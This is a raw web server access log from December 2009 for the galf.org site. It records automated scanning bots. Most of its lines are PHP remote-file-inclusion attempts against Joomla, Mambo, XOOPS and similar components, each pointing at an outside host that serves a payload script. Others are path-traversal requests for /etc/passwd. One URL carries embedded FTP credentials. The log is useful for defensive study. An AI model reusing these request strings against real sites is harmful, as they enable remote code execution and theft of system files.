125.160.17.200 - - [28/Dec/2009:01:36:50 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:36:50 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:36:50 -0800] "GET /appserv/main.php?appserv_root=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:36:50 -0800] "GET /appserv/main.php?appserv_root=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:01:36:52 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:01:37:37 -0800] "GET /logs/access_090921.log///vwar/backup/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:01:37:38 -0800] "GET //vwar/backup/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:01:37:38 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:40:09 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:40:09 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:40:10 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [28/Dec/2009:01:41:07 -0800] "GET /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [28/Dec/2009:01:41:07 -0800] "GET /logs/access_091207.log//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [28/Dec/2009:01:41:07 -0800] "GET /logs/access_090810.log//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.177.26.62 - - [28/Dec/2009:01:41:07 -0800] "GET /logs//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:41:29 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:41:37 -0800] "GET /logs/access_090720.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:41:37 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:41:37 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:01:41:51 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "galf.org"
196.40.83.71 - - [28/Dec/2009:01:41:51 -0800] "GET //vwar/backup/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "galf.org"
196.40.83.71 - - [28/Dec/2009:01:41:51 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "galf.org"
195.228.45.47 - - [28/Dec/2009:01:41:54 -0800] "GET /logs/access_090914.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:42:13 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:42:13 -0800] "GET /logs/access_090706.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [28/Dec/2009:01:42:13 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:42:25 -0800] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:42:25 -0800] "GET /main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [28/Dec/2009:01:48:07 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [28/Dec/2009:01:48:07 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:48:50 -0800] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:48:50 -0800] "GET /main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:49:19 -0800] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:49:19 -0800] "GET /main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
213.171.37.206 - - [28/Dec/2009:01:49:22 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [28/Dec/2009:01:49:22 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:01:49:33 -0800] "GET /logs/access_090803.log%20//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [28/Dec/2009:01:50:34 -0800] "GET /logs/access_090914.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [28/Dec/2009:01:50:42 -0800] "GET /logs/access_090706.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:53:06 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:01:53:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:01:53:13 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:53:13 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:53:13 -0800] "GET /logs/access_091221.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:53:57 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:53:57 -0800] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:53:57 -0800] "GET /logs/access_090817.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:53:57 -0800] "GET /logs/access_091123.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:02 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:02 -0800] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:02 -0800] "GET /logs/access_090817.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:02 -0800] "GET /logs/access_091123.log%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:03 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:03 -0800] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:03 -0800] "GET /logs/access_091123.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:04 -0800] "GET /logs/access_090817.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:05 -0800] "GET /logs/access_090817.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:05 -0800] "GET /logs/access_091123.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:06 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:01:54:06 -0800] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:01:56:46 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:01:56:47 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.205.250 - - [28/Dec/2009:01:56:47 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
93.190.41.97 - - [28/Dec/2009:01:57:17 -0800] "GET /logs/access_090921.log/?sourcedir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
93.190.41.97 - - [28/Dec/2009:01:57:17 -0800] "GET /?sourcedir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.833" "www.galf.org"
93.190.41.97 - - [28/Dec/2009:01:57:17 -0800] "GET /logs/?sourcedir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.833" "www.galf.org"
213.171.37.206 - - [28/Dec/2009:01:58:08 -0800] "GET /logs/access_090914.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [28/Dec/2009:01:58:16 -0800] "GET /logs/access_090706.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://e-winiarze.nasze.org/components/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
115.68.3.94 - - [28/Dec/2009:01:58:22 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.xenguide.pe.kr/log/plug_in_config/id/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
115.68.3.94 - - [28/Dec/2009:01:58:23 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.xenguide.pe.kr/log/plug_in_config/id/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.80.193.29 - - [28/Dec/2009:02:02:48 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {30CE4593-C663-4EA2-8EFD-B03D8B0DF63F}; SV1; .NET CLR 1.1.4322)" "www.galf.org"
190.24.131.38 - - [28/Dec/2009:02:08:08 -0800] "GET /logs/access_091221.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sianow.beep.pl/gim/templates/pm_millennium_keyboard/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [28/Dec/2009:02:08:08 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sianow.beep.pl/gim/templates/pm_millennium_keyboard/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [28/Dec/2009:02:08:08 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sianow.beep.pl/gim/templates/pm_millennium_keyboard/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:09:18 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:09:18 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:09:18 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:02:09:18 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.165.193.182 - - [28/Dec/2009:02:09:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.165.193.182 - - [28/Dec/2009:02:09:35 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.165.193.182 - - [28/Dec/2009:02:09:35 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:02:10:32 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:02:10:32 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:02:10:32 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [28/Dec/2009:02:11:39 -0800] "GET /logs/access_091228.log HTTP/1.0" 200 6435147 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
124.115.1.62 - - [28/Dec/2009:02:12:13 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
213.171.37.206 - - [28/Dec/2009:02:15:26 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [28/Dec/2009:02:15:26 -0800] "GET /logs/access_091221.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [28/Dec/2009:02:15:26 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://ujcar.deva.rdsnet.ro/language/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:02:16:20 -0800] "GET /modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:02:16:20 -0800] "GET /logs/access_091221.log//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:02:16:20 -0800] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:02:16:53 -0800] "GET /logs/access.log//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.195.252.206 - - [28/Dec/2009:02:16:53 -0800] "GET /modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.195.252.206 - - [28/Dec/2009:02:16:53 -0800] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.165.193.182 - - [28/Dec/2009:02:20:15 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:21:25 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:22:28 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:23:12 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:02:23:24 -0800] "GET /logs/access.log%20%20//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:02:23:27 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:02:23:44 -0800] "GET /logs/access_091221.log%20%20//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:23:47 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:02:23:52 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
